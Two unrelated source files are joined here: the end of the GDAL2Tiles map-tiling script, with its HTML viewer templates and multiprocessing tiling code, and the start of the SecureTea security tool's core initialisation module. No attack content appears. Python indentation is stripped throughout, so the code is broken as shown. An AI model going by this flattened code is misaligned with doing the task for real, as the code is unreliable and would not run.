if (document.documentElement && document.documentElement.clientWidth)
return document.documentElement.clientWidth;
if (document.body) return document.body.clientWidth;
return 0;
}
function resize() {
var map = document.getElementById("map");
var header = document.getElementById("header");
var subheader = document.getElementById("subheader");
map.style.height = (getWindowHeight()-80) + "px";
map.style.width = (getWindowWidth()-20) + "px";
header.style.width = (getWindowWidth()-20) + "px";
subheader.style.width = (getWindowWidth()-20) + "px";
// map.checkResize();
}
/*
* Main load function:
*/
function load() {
if (GBrowserIsCompatible()) {
// Bug in the Google Maps: Copyright for Overlay is not correctly displayed
var gcr = GMapType.prototype.getCopyrights;
GMapType.prototype.getCopyrights = function(bounds,zoom) {
return ["%(copyright)s"].concat(gcr.call(this,bounds,zoom));
}
map = new GMap2( document.getElementById("map"), { backgroundColor: '#fff' } );
map.addMapType(G_PHYSICAL_MAP);
map.setMapType(G_PHYSICAL_MAP);
map.setCenter( mapBounds.getCenter(), map.getBoundsZoomLevel( mapBounds ));
hybridOverlay = new GTileLayerOverlay( G_HYBRID_MAP.getTileLayers()[1] );
GEvent.addListener(map, "maptypechanged", function() {
if (map.getCurrentMapType() == G_HYBRID_MAP) {
map.addOverlay(hybridOverlay);
} else {
map.removeOverlay(hybridOverlay);
}
} );
var tilelayer = new GTileLayer(GCopyrightCollection(''), mapMinZoom, mapMaxZoom);
var mercator = new GMercatorProjection(mapMaxZoom+1);
tilelayer.getTileUrl = function(tile,zoom) {
if ((zoom < mapMinZoom) || (zoom > mapMaxZoom)) {
return "http://www.maptiler.org/img/none.png";
}
var ymax = 1 << zoom;
var y = ymax - tile.y -1;
var tileBounds = new GLatLngBounds(
mercator.fromPixelToLatLng( new GPoint( (tile.x)*256, (tile.y+1)*256 ) , zoom ),
mercator.fromPixelToLatLng( new GPoint( (tile.x+1)*256, (tile.y)*256 ) , zoom )
);
if (mapBounds.intersects(tileBounds)) {
return zoom+"/"+tile.x+"/"+y+".png";
} else {
return "http://www.maptiler.org/img/none.png";
}
}
// IE 7-: support for PNG alpha channel
// Unfortunately, the opacity of the whole overlay is then not changeable
tilelayer.isPng = function() { return true;};
tilelayer.getOpacity = function() { return opacity; }
overlay = new GTileLayerOverlay( tilelayer );
map.addOverlay(overlay);
map.addControl(new GLargeMapControl());
map.addControl(new GHierarchicalMapTypeControl());
map.addControl(new CTransparencyControl( overlay ));
""" % args # noqa
if self.kml:
s += """
map.addMapType(G_SATELLITE_3D_MAP);
map.getEarthInstance(getEarthInstanceCB);
"""
s += """
map.enableContinuousZoom();
map.enableScrollWheelZoom();
map.setMapType(G_HYBRID_MAP);
}
resize();
}
"""
if self.kml:
s += """
function getEarthInstanceCB(object) {
var ge = object;
if (ge) {
var url = document.location.toString();
url = url.substr(0,url.lastIndexOf('/'))+'/doc.kml';
var link = ge.createLink("");
if ("%(publishurl)s") { link.setHref("%(publishurl)s/doc.kml") }
else { link.setHref(url) };
var networkLink = ge.createNetworkLink("");
networkLink.setName("TMS Map Overlay");
networkLink.setFlyToView(true);
networkLink.setLink(link);
ge.getFeatures().appendChild(networkLink);
} else {
// alert("You should open a KML in Google Earth");
// add div with the link to generated KML... - maybe JavaScript redirect to the URL of KML?
}
}
""" % args # noqa
s += """
onresize=function(){ resize(); };
//]]>
</script>
</head>
<body onload="load()">
<div id="header"><h1>%(title)s</h1></div>
<div id="subheader">Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright © 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> & <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a>
<!-- PLEASE, LET THIS NOTE ABOUT AUTHOR AND PROJECT SOMEWHERE ON YOUR WEBSITE, OR AT LEAST IN THE COMMENT IN HTML. THANK YOU -->
</div>
<div id="map"></div>
</body>
</html>
""" % args # noqa
return s
def generate_leaflet(self):
"""
Template for leaflet.html implementing overlay of tiles for 'mercator' profile.
It returns filled string. Expected variables:
title, north, south, east, west, minzoom, maxzoom, tile_size, tileformat, publishurl
"""
args = {}
args['title'] = self.options.title.replace('"', '\\"')
args['htmltitle'] = self.options.title
args['south'], args['west'], args['north'], args['east'] = self.swne
args['centerlat'] = (args['north'] + args['south']) / 2.
args['centerlon'] = (args['west'] + args['east']) / 2.
args['minzoom'] = self.tminz
args['maxzoom'] = self.tmaxz
args['beginzoom'] = self.tmaxz
args['tile_size'] = self.tile_size # not used
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url # not used
args['copyright'] = self.options.copyright.replace('"', '\\"')
s = """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name='viewport' content='width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no' />
<title>%(htmltitle)s</title>
<!-- Leaflet -->
<link rel="stylesheet" href="http://cdn.leafletjs.com/leaflet-0.7.5/leaflet.css" />
<script src="http://cdn.leafletjs.com/leaflet-0.7.5/leaflet.js"></script>
<style>
body { margin:0; padding:0; }
body, table, tr, td, th, div, h1, h2, input { font-family: "Calibri", "Trebuchet MS", "Ubuntu", Serif; font-size: 11pt; }
#map { position:absolute; top:0; bottom:0; width:100%%; } /* full size */
.ctl {
padding: 2px 10px 2px 10px;
background: white;
background: rgba(255,255,255,0.9);
box-shadow: 0 0 15px rgba(0,0,0,0.2);
border-radius: 5px;
text-align: right;
}
.title {
font-size: 18pt;
font-weight: bold;
}
.src {
font-size: 10pt;
}
</style>
</head>
<body>
<div id="map"></div>
<script>
/* **** Leaflet **** */
// Base layers
// .. OpenStreetMap
var osm = L.tileLayer('http://{s}.tile.osm.org/{z}/{x}/{y}.png', {attribution: '© <a href="http://osm.org/copyright">OpenStreetMap</a> contributors', minZoom: %(minzoom)s, maxZoom: %(maxzoom)s});
// .. CartoDB Positron
var cartodb = L.tileLayer('http://{s}.basemaps.cartocdn.com/light_all/{z}/{x}/{y}.png', {attribution: '© <a href="http://www.openstreetmap.org/copyright">OpenStreetMap</a> contributors, © <a href="http://cartodb.com/attributions">CartoDB</a>', minZoom: %(minzoom)s, maxZoom: %(maxzoom)s});
// .. OSM Toner
var toner = L.tileLayer('http://{s}.tile.stamen.com/toner/{z}/{x}/{y}.png', {attribution: 'Map tiles by <a href="http://stamen.com">Stamen Design</a>, under <a href="http://creativecommons.org/licenses/by/3.0">CC BY 3.0</a>. Data by <a href="http://openstreetmap.org">OpenStreetMap</a>, under <a href="http://www.openstreetmap.org/copyright">ODbL</a>.', minZoom: %(minzoom)s, maxZoom: %(maxzoom)s});
// .. White background
var white = L.tileLayer("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAQAAAAEAAQMAAABmvDolAAAAA1BMVEX///+nxBvIAAAAH0lEQVQYGe3BAQ0AAADCIPunfg43YAAAAAAAAAAA5wIhAAAB9aK9BAAAAABJRU5ErkJggg==", {minZoom: %(minzoom)s, maxZoom: %(maxzoom)s});
// Overlay layers (TMS)
var lyr = L.tileLayer('./{z}/{x}/{y}.%(tileformat)s', {tms: true, opacity: 0.7, attribution: "%(copyright)s", minZoom: %(minzoom)s, maxZoom: %(maxzoom)s});
// Map
var map = L.map('map', {
center: [%(centerlat)s, %(centerlon)s],
zoom: %(beginzoom)s,
minZoom: %(minzoom)s,
maxZoom: %(maxzoom)s,
layers: [osm]
});
var basemaps = {"OpenStreetMap": osm, "CartoDB Positron": cartodb, "Stamen Toner": toner, "Without background": white}
var overlaymaps = {"Layer": lyr}
// Title
var title = L.control();
title.onAdd = function(map) {
this._div = L.DomUtil.create('div', 'ctl title');
this.update();
return this._div;
};
title.update = function(props) {
this._div.innerHTML = "%(title)s";
};
title.addTo(map);
// Note
var src = 'Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright © 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> & <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a>';
var title = L.control({position: 'bottomleft'});
title.onAdd = function(map) {
this._div = L.DomUtil.create('div', 'ctl src');
this.update();
return this._div;
};
title.update = function(props) {
this._div.innerHTML = src;
};
title.addTo(map);
// Add base layers
L.control.layers(basemaps, overlaymaps, {collapsed: false}).addTo(map);
// Fit to overlay bounds (SW and NE points with (lat, lon))
map.fitBounds([[%(south)s, %(west)s], [%(north)s, %(east)s]]);
</script>
</body>
</html>
""" % args # noqa
return s
def generate_openlayers(self):
"""
Template for openlayers.html implementing overlay of available Spherical Mercator layers.
It returns filled string. Expected variables:
title, bingkey, north, south, east, west, minzoom, maxzoom, tile_size, tileformat, publishurl
"""
args = {}
args['title'] = self.options.title
args['bingkey'] = self.options.bingkey
args['south'], args['west'], args['north'], args['east'] = self.swne
args['minzoom'] = self.tminz
args['maxzoom'] = self.tmaxz
args['tile_size'] = self.tile_size
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url
args['copyright'] = self.options.copyright
if self.options.tmscompatible:
args['tmsoffset'] = "-1"
else:
args['tmsoffset'] = ""
if self.options.profile == 'raster':
args['rasterzoomlevels'] = self.tmaxz + 1
args['rastermaxresolution'] = 2**(self.nativezoom) * self.out_gt[1]
s = r"""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>%(title)s</title>
<meta http-equiv='imagetoolbar' content='no'/>
<style type="text/css"> v\:* {behavior:url(#default#VML);}
html, body { overflow: hidden; padding: 0; height: 100%%; width: 100%%; font-family: 'Lucida Grande',Geneva,Arial,Verdana,sans-serif; }
body { margin: 10px; background: #fff; }
h1 { margin: 0; padding: 6px; border:0; font-size: 20pt; }
#header { height: 43px; padding: 0; background-color: #eee; border: 1px solid #888; }
#subheader { height: 12px; text-align: right; font-size: 10px; color: #555;}
#map { height: 95%%; border: 1px solid #888; }
.olImageLoadError { display: none; }
.olControlLayerSwitcher .layersDiv { border-radius: 10px 0 0 10px; }
</style>""" % args # noqa
if self.options.profile == 'mercator':
s += """
<script src='http://maps.google.com/maps/api/js?sensor=false&v=3.7'></script>
""" % args
s += """
<script src="http://www.openlayers.org/api/2.12/OpenLayers.js"></script>
<script>
var map;
var mapBounds = new OpenLayers.Bounds( %(west)s, %(south)s, %(east)s, %(north)s);
var mapMinZoom = %(minzoom)s;
var mapMaxZoom = %(maxzoom)s;
var emptyTileURL = "http://www.maptiler.org/img/none.png";
OpenLayers.IMAGE_RELOAD_ATTEMPTS = 3;
function init(){""" % args
if self.options.profile == 'mercator':
s += """
var options = {
div: "map",
controls: [],
projection: "EPSG:3857",
displayProjection: new OpenLayers.Projection("EPSG:4326"),
numZoomLevels: 20
};
map = new OpenLayers.Map(options);
// Create Google Mercator layers
var gmap = new OpenLayers.Layer.Google("Google Streets",
{
type: google.maps.MapTypeId.ROADMAP,
sphericalMercator: true
});
var gsat = new OpenLayers.Layer.Google("Google Satellite",
{
type: google.maps.MapTypeId.SATELLITE,
sphericalMercator: true
});
var ghyb = new OpenLayers.Layer.Google("Google Hybrid",
{
type: google.maps.MapTypeId.HYBRID,
sphericalMercator: true
});
var gter = new OpenLayers.Layer.Google("Google Terrain",
{
type: google.maps.MapTypeId.TERRAIN,
sphericalMercator: true
});
// Create Bing layers
var broad = new OpenLayers.Layer.Bing({
name: "Bing Roads",
key: "%(bingkey)s",
type: "Road",
sphericalMercator: true
});
var baer = new OpenLayers.Layer.Bing({
name: "Bing Aerial",
key: "%(bingkey)s",
type: "Aerial",
sphericalMercator: true
});
var bhyb = new OpenLayers.Layer.Bing({
name: "Bing Hybrid",
key: "%(bingkey)s",
type: "AerialWithLabels",
sphericalMercator: true
});
// Create OSM layer
var osm = new OpenLayers.Layer.OSM("OpenStreetMap");
// create TMS Overlay layer
var tmsoverlay = new OpenLayers.Layer.TMS("TMS Overlay", "",
{
serviceVersion: '.',
layername: '.',
alpha: true,
type: '%(tileformat)s',
isBaseLayer: false,
getURL: getURL
});
if (OpenLayers.Util.alphaHack() == false) {
tmsoverlay.setOpacity(0.7);
}
map.addLayers([gmap, gsat, ghyb, gter,
broad, baer, bhyb,
osm, tmsoverlay]);
var switcherControl = new OpenLayers.Control.LayerSwitcher();
map.addControl(switcherControl);
switcherControl.maximizeControl();
map.zoomToExtent(mapBounds.transform(map.displayProjection, map.projection));
""" % args # noqa
elif self.options.profile == 'geodetic':
s += """
var options = {
div: "map",
controls: [],
projection: "EPSG:4326"
};
map = new OpenLayers.Map(options);
var wms = new OpenLayers.Layer.WMS("VMap0",
"http://tilecache.osgeo.org/wms-c/Basic.py?",
{
layers: 'basic',
format: 'image/png'
}
);
var tmsoverlay = new OpenLayers.Layer.TMS("TMS Overlay", "",
{
serviceVersion: '.',
layername: '.',
alpha: true,
type: '%(tileformat)s',
isBaseLayer: false,
getURL: getURL
});
if (OpenLayers.Util.alphaHack() == false) {
tmsoverlay.setOpacity(0.7);
}
map.addLayers([wms,tmsoverlay]);
var switcherControl = new OpenLayers.Control.LayerSwitcher();
map.addControl(switcherControl);
switcherControl.maximizeControl();
map.zoomToExtent(mapBounds);
""" % args # noqa
elif self.options.profile == 'raster':
s += """
var options = {
div: "map",
controls: [],
maxExtent: new OpenLayers.Bounds(%(west)s, %(south)s, %(east)s, %(north)s),
maxResolution: %(rastermaxresolution)f,
numZoomLevels: %(rasterzoomlevels)d
};
map = new OpenLayers.Map(options);
var layer = new OpenLayers.Layer.TMS("TMS Layer", "",
{
serviceVersion: '.',
layername: '.',
alpha: true,
type: '%(tileformat)s',
getURL: getURL
});
map.addLayer(layer);
map.zoomToExtent(mapBounds);
""" % args # noqa
s += """
map.addControls([new OpenLayers.Control.PanZoomBar(),
new OpenLayers.Control.Navigation(),
new OpenLayers.Control.MousePosition(),
new OpenLayers.Control.ArgParser(),
new OpenLayers.Control.Attribution()]);
}
""" % args
if self.options.profile == 'mercator':
s += """
function getURL(bounds) {
bounds = this.adjustBounds(bounds);
var res = this.getServerResolution();
var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tileSize.w));
var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tileSize.h));
var z = this.getServerZoom();
if (this.map.baseLayer.CLASS_NAME === 'OpenLayers.Layer.Bing') {
z+=1;
}
var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type;
var url = this.url;
if (OpenLayers.Util.isArray(url)) {
url = this.selectUrl(path, url);
}
if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) {
return url + path;
} else {
return emptyTileURL;
}
}
""" % args # noqa
elif self.options.profile == 'geodetic':
s += """
function getURL(bounds) {
bounds = this.adjustBounds(bounds);
var res = this.getServerResolution();
var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tileSize.w));
var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tileSize.h));
var z = this.getServerZoom()%(tmsoffset)s;
var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type;
var url = this.url;
if (OpenLayers.Util.isArray(url)) {
url = this.selectUrl(path, url);
}
if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) {
return url + path;
} else {
return emptyTileURL;
}
}
""" % args # noqa
elif self.options.profile == 'raster':
s += """
function getURL(bounds) {
bounds = this.adjustBounds(bounds);
var res = this.getServerResolution();
var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tileSize.w));
var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tileSize.h));
var z = this.getServerZoom();
var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type;
var url = this.url;
if (OpenLayers.Util.isArray(url)) {
url = this.selectUrl(path, url);
}
if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) {
return url + path;
} else {
return emptyTileURL;
}
}
""" % args # noqa
s += """
function getWindowHeight() {
if (self.innerHeight) return self.innerHeight;
if (document.documentElement && document.documentElement.clientHeight)
return document.documentElement.clientHeight;
if (document.body) return document.body.clientHeight;
return 0;
}
function getWindowWidth() {
if (self.innerWidth) return self.innerWidth;
if (document.documentElement && document.documentElement.clientWidth)
return document.documentElement.clientWidth;
if (document.body) return document.body.clientWidth;
return 0;
}
function resize() {
var map = document.getElementById("map");
var header = document.getElementById("header");
var subheader = document.getElementById("subheader");
map.style.height = (getWindowHeight()-80) + "px";
map.style.width = (getWindowWidth()-20) + "px";
header.style.width = (getWindowWidth()-20) + "px";
subheader.style.width = (getWindowWidth()-20) + "px";
if (map.updateSize) { map.updateSize(); };
}
onresize=function(){ resize(); };
</script>
</head>
<body onload="init()">
<div id="header"><h1>%(title)s</h1></div>
<div id="subheader">Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright © 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> & <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a>
<!-- PLEASE, LET THIS NOTE ABOUT AUTHOR AND PROJECT SOMEWHERE ON YOUR WEBSITE, OR AT LEAST IN THE COMMENT IN HTML. THANK YOU -->
</div>
<div id="map"></div>
<script type="text/javascript" >resize()</script>
</body>
</html>""" % args # noqa
return s
def worker_tile_details(input_file, output_folder, options, send_pipe=None):
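    # Open the input dataset, write the tiling metadata and compute the list of base-tile
    # work items; when run in a child process the result is also sent back through send_pipe.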
try:
gdal2tiles = GDAL2Tiles(input_file, output_folder, options)
gdal2tiles.open_input()
gdal2tiles.generate_metadata()
tile_job_info, tile_details = gdal2tiles.generate_base_tiles()
return_data = (tile_job_info, tile_details)
if send_pipe:
send_pipe.send(return_data)
return return_data
except Exception as e:
print("worker_tile_details failed ", str(e))
def progress_printer_thread(queue, nb_jobs):
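    # Drain the shared queue: each worker posts one message per finished tile, so popping
    # nb_jobs items advances the progress bar to completion.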
pb = ProgressBar(nb_jobs)
pb.start()
for _ in range(nb_jobs):
queue.get()
pb.log_progress()
queue.task_done()
class ProgressBar(object):
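    # Minimal textual progress bar: start() prints "0", then log_progress() emits one '.'
    # per 2.5% step and the percentage figure at every 10%, ending with a newline at 100%.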
def __init__(self, total_items):
self.total_items = total_items
self.nb_items_done = 0
self.current_progress = 0
self.STEP = 2.5
def start(self):
sys.stdout.write("0")
def log_progress(self, nb_items=1):
self.nb_items_done += nb_items
progress = float(self.nb_items_done) / self.total_items * 100
if progress >= self.current_progress + self.STEP:
done = False
while not done:
if self.current_progress + self.STEP <= progress:
self.current_progress += self.STEP
if self.current_progress % 10 == 0:
sys.stdout.write(str(int(self.current_progress)))
if self.current_progress == 100:
sys.stdout.write("\n")
else:
sys.stdout.write(".")
else:
done = True
sys.stdout.flush()
def get_tile_swne(tile_job_info, options):
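    # Return a function mapping tile coordinates (x, y, z) to their (south, west, north, east)
    # bounds in EPSG:4326 for the selected profile.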
if options.profile == 'mercator':
mercator = GlobalMercator()
tile_swne = mercator.TileLatLonBounds
elif options.profile == 'geodetic':
geodetic = GlobalGeodetic(options.tmscompatible)
tile_swne = geodetic.TileLatLonBounds
elif options.profile == 'raster':
srs4326 = osr.SpatialReference()
srs4326.ImportFromEPSG(4326)
if tile_job_info.kml and tile_job_info.in_srs_wkt:
in_srs = osr.SpatialReference()
in_srs.ImportFromWkt(tile_job_info.in_srs_wkt)
ct = osr.CoordinateTransformation(in_srs, srs4326)
def rastertileswne(x, y, z):
pixelsizex = (2 ** (tile_job_info.tmaxz - z) * tile_job_info.out_geo_trans[1])
west = tile_job_info.out_geo_trans[0] + x * tile_job_info.tile_size * pixelsizex
east = west + tile_job_info.tile_size * pixelsizex
south = tile_job_info.ominy + y * tile_job_info.tile_size * pixelsizex
north = south + tile_job_info.tile_size * pixelsizex
if not tile_job_info.is_epsg_4326:
# Transformation to EPSG:4326 (WGS84 datum)
west, south = ct.TransformPoint(west, south)[:2]
east, north = ct.TransformPoint(east, north)[:2]
return south, west, north, east
tile_swne = rastertileswne
else:
tile_swne = lambda x, y, z: (0, 0, 0, 0) # noqa
else:
tile_swne = lambda x, y, z: (0, 0, 0, 0) # noqa
return tile_swne
def single_threaded_tiling(input_file, output_folder, options):
"""
    Keep a single-threaded version that stays clear of multiprocessing, for platforms that do not
    support it.
"""
if options.verbose:
print("Begin tiles details calc")
conf, tile_details = worker_tile_details(input_file, output_folder, options)
if options.verbose:
print("Tiles details calc complete.")
if not options.verbose and not options.quiet:
progress_bar = ProgressBar(len(tile_details))
progress_bar.start()
for tile_detail in tile_details:
create_base_tile(conf, tile_detail)
if not options.verbose and not options.quiet:
progress_bar.log_progress()
if getattr(threadLocal, 'cached_ds', None):
del threadLocal.cached_ds
create_overview_tiles(conf, output_folder, options)
shutil.rmtree(os.path.dirname(conf.src_file))
def multi_threaded_tiling(input_file, output_folder, options):
nb_processes = options.nb_processes or 1
# Make sure that all processes do not consume more than `gdal.GetCacheMax()`
os.environ['GDAL_CACHEMAX'] = '%d' % max(1, int(gdal.GetCacheMax() / 1024 / 1024 / nb_processes))
(conf_receiver, conf_sender) = Pipe(False)
if options.verbose:
print("Begin tiles details calc")
p = Process(target=worker_tile_details,
args=[input_file, output_folder, options],
kwargs={"send_pipe": conf_sender})
p.start()
    # Make sure to consume the pipe before joining. If the payload is too big, it won't fit in the
    # pipe buffer in one go, so the sending process would block forever waiting for space to send
    # the rest of the data.
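    # Illustrative sketch of the same pattern (names here are generic, not part of this script):
    #
    #     recv_end, send_end = Pipe(False)
    #     child = Process(target=producer, args=(send_end,))
    #     child.start()
    #     payload = recv_end.recv()   # drain the pipe first...
    #     child.join()                # ...then join, so the child never blocks on a full buffer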
conf, tile_details = conf_receiver.recv()
p.join()
if options.verbose:
print("Tiles details calc complete.")
# Have to create the Queue through a multiprocessing.Manager to get a Queue Proxy,
# otherwise you can't pass it as a param in the method invoked by the pool...
manager = Manager()
queue = manager.Queue()
pool = Pool(processes=nb_processes)
# TODO: gbataille - check the confs for which each element is an array... one useless level?
# TODO: gbataille - assign an ID to each job for print in verbose mode "ReadRaster Extent ..."
for tile_detail in tile_details:
pool.apply_async(create_base_tile, (conf, tile_detail), {"queue": queue})
if not options.verbose and not options.quiet:
p = Process(target=progress_printer_thread, args=[queue, len(tile_details)])
p.start()
pool.close()
pool.join() # Jobs finished
if not options.verbose and not options.quiet:
p.join() # Traces done
create_overview_tiles(conf, output_folder, options)
shutil.rmtree(os.path.dirname(conf.src_file))
def main():
# TODO: gbataille - use mkdtemp to work in a temp directory
# TODO: gbataille - debug intermediate tiles.vrt not produced anymore?
# TODO: gbataille - Refactor generate overview tiles to not depend on self variables
argv = gdal.GeneralCmdLineProcessor(sys.argv)
input_file, output_folder, options = process_args(argv[1:])
nb_processes = options.nb_processes or 1
if nb_processes == 1:
single_threaded_tiling(input_file, output_folder, options)
else:
multi_threaded_tiling(input_file, output_folder, options)
if __name__ == '__main__':
main()
# vim: set tabstop=4 shiftwidth=4 expandtab:
|
core.py
|
# -*- coding: utf-8 -*-
u"""SecureTea.
Project:
╔═╗┌─┐┌─┐┬ ┬┬─┐┌─┐╔╦╗┌─┐┌─┐
╚═╗├┤ │ │ │├┬┘├┤ ║ ├┤ ├─┤
╚═╝└─┘└─┘└─┘┴└─└─┘ ╩ └─┘┴ ┴
Version: 1.1
Module: SecureTea
"""
# To share mouse gestures
import struct
import sys
import time
import threading
from securetea import configurations
from securetea import logger
from securetea.lib.notifs import secureTeaTwitter
from securetea.lib.notifs.secureTeaTelegram import SecureTeaTelegram
from securetea.lib.notifs import secureTeaSlack
from securetea.lib.notifs.aws import secureTeaAwsSES
from securetea.lib.firewall import secureTeaFirewall
from securetea.lib.notifs import secureTeaTwilio
from securetea.lib.notifs import secureTeaGmail
from securetea.args.arguments import get_args
from securetea.args.args_helper import ArgsHelper
from securetea.lib.firewall.utils import setup_logger
from securetea.lib.security_header import secureTeaHeaders
from securetea.lib.ids import secureTeaIDS
from securetea.lib.log_monitor.system_log import engine
from securetea.lib.log_monitor.server_log.secureTeaServerLog import SecureTeaServerLog
from securetea.lib.auto_server_patcher.secureTeaServerPatcher import SecureTeaAutoServerPatcher
from securetea.lib.web_deface.secureTeaWebDeface import WebDeface
from securetea.lib.antivirus.secureTeaAntiVirus import SecureTeaAntiVirus
from securetea.lib.iot import iot_checker
from securetea.modes import server_mode
from securetea.modes import system_mode
from securetea.modes import iot_mode
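# pynput needs a display session; if the import fails (e.g. on a headless server),
# SecureTea falls back to reading raw movement packets from /dev/input/mice.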
pynput_status = True
try:
from pynput import mouse
except Exception as e:
pynput_status = False
class SecureTea(object):
"""SecureTea Class."""
alert_count = 1
def __init__(self):
"""Init SecureTea params.
Args:
None
Raises:
None
Returns:
None
Working:
        Collects the arguments passed and calls the respective module
        to parse them. Then creates an object for each requested
        notification medium and starts SecureTea.
"""
modulename = 'Core'
self.cred = {}
args = get_args()
argsHelper = ArgsHelper(args)
args_dict = argsHelper.check_args()
credentials = configurations.SecureTeaConf()
self.cred = args_dict['cred']
self.cred_provided = args_dict['cred_provided']
self.twitter_provided = args_dict['twitter_provided']
self.telegram_provided = args_dict['telegram_provided']
self.twilio_provided = args_dict['twilio_provided']
self.slack_provided = args_dict['slack_provided']
self.aws_ses_provided = args_dict['aws_ses_provided']
self.gmail_provided = args_dict['gmail_provided']
self.firewall_provided = args_dict['firewall_provided']
self.insecure_headers_provided = args_dict['insecure_headers_provided']
self.ids_provided = args_dict['ids_provided']
self.system_log_provided = args_dict['system_log_provided']
self.server_log_provided = args_dict['server_log_provided']
self.auto_server_patcher_provided = args_dict['auto_server_patcher_provided']
self.web_deface_provided = args_dict['web_deface_provided']
self.antivirus_provided = args_dict['antivirus_provided']
self.iot_checker_provided = args_dict['iot_checker_provided']
self.server_mode = args_dict["server_mode"]
self.system_mode = args_dict["system_mode"]
self.iot_mode = args_dict["iot_mode"]
# Initialize logger
self.logger = logger.SecureTeaLogger(
modulename,
self.cred['debug']
)
# Setup logger for utils
setup_logger(debug=self.cred['debug'])
if self.cred_provided:
credentials.save_creds(self.cred)
else:
self.cred = credentials.get_creds(args)
try:
if self.cred['twitter']:
self.twitter_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Twitter configuration parameter not set.",
logtype="error"
)
try:
if self.cred['telegram']:
self.telegram_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Telegram configuration parameter not set.",
logtype="error"
)
try:
if self.cred['twilio']:
self.twilio_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Twilio configuration parameter not set.",
logtype="error"
)
try:
if self.cred['slack']:
self.slack_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Slack configuration parameter not set.",
logtype="error"
)
try:
if self.cred['aws_ses']:
self.aws_ses_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"AWS SES configuration parameter not set.",
logtype="error"
)
try:
if self.cred['gmail']:
self.gmail_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Gmail configuraton parameter not set.",
logtype="error"
)
try:
if self.cred['firewall']:
self.firewall_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Firewall configuraton parameter not set.",
logtype="error"
)
try:
if self.cred['insecure_headers']:
self.insecure_headers_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Insecure headers parameter not set.",
logtype="error"
)
try:
if self.cred['ids']:
self.ids_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Intrusion Detection System (IDS) not set.",
logtype="error"
)
try:
if self.cred['server_log']:
self.server_log_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Server Log configuraton parameter not set.",
logtype="error"
)
try:
if self.cred['auto_server_patcher']:
self.auto_server_patcher_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Auto server patcher configuraton not set.",
logtype="error"
)
try:
if self.cred['web-deface']:
self.web_deface_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Web Deface Detection configuraton not set.",
logtype="eror"
)
try:
if self.cred['antivirus']:
self.antivirus_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"AntiVirus configuraton not set.",
logtype="error"
)
try:
if self.cred['iot-check']:
self.iot_checker_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"IoT Checker configuraton not set.",
logtype="error"
)
if not self.cred:
self.logger.log(
"Configuration not found.",
logtype="error"
)
sys.exit(0)
if not self.cred_provided:
self.logger.log(
"None of the notifications configured. Exiting...",
logtype="error"
)
sys.exit(0)
self.logger.log(
"Welcome to SecureTea..!! Initializing System",
logtype="info"
)
# Initialize modes at first (Server, System, IoT)
# Check for Server mode
if self.server_mode:
self.logger.log(
"Starting SecureTea in server mode",
logtype="info"
)
# Initialize Server Mode object
self.server_mode_obj = server_mode.ServerMode(cred=self.cred, debug=self.cred["debug"])
self.server_mode_obj.start_server_mode()
            # The server mode already starts these components, so disable their *_provided flags to avoid duplicate processes
self.firewall_provided = False
self.server_log_provided = False
self.antivirus_provided = False
self.web_deface_provided = False
self.system_log_provided = False
self.auto_server_patcher_provided = False
self.ids_provided = False
# Check for System mode
if self.system_mode:
self.logger.log(
"Starting SecureTea in system mode",
logtype="info"
)
# Initialize System Mode object
self.system_mode_obj = system_mode.SystemMode(cred=self.cred, debug=self.cred["debug"])
self.system_mode_obj.start_system_mode()
            # The system mode already starts these components, so disable their *_provided flags to avoid duplicate processes
self.firewall_provided = False
self.antivirus_provided = False
self.system_log_provided = False
self.ids_provided = False
# Check for IoT mode
if self.iot_mode:
self.logger.log(
"Starting SecureTea in IoT mode",
logtype="info"
)
# Initialize IoT Mode object
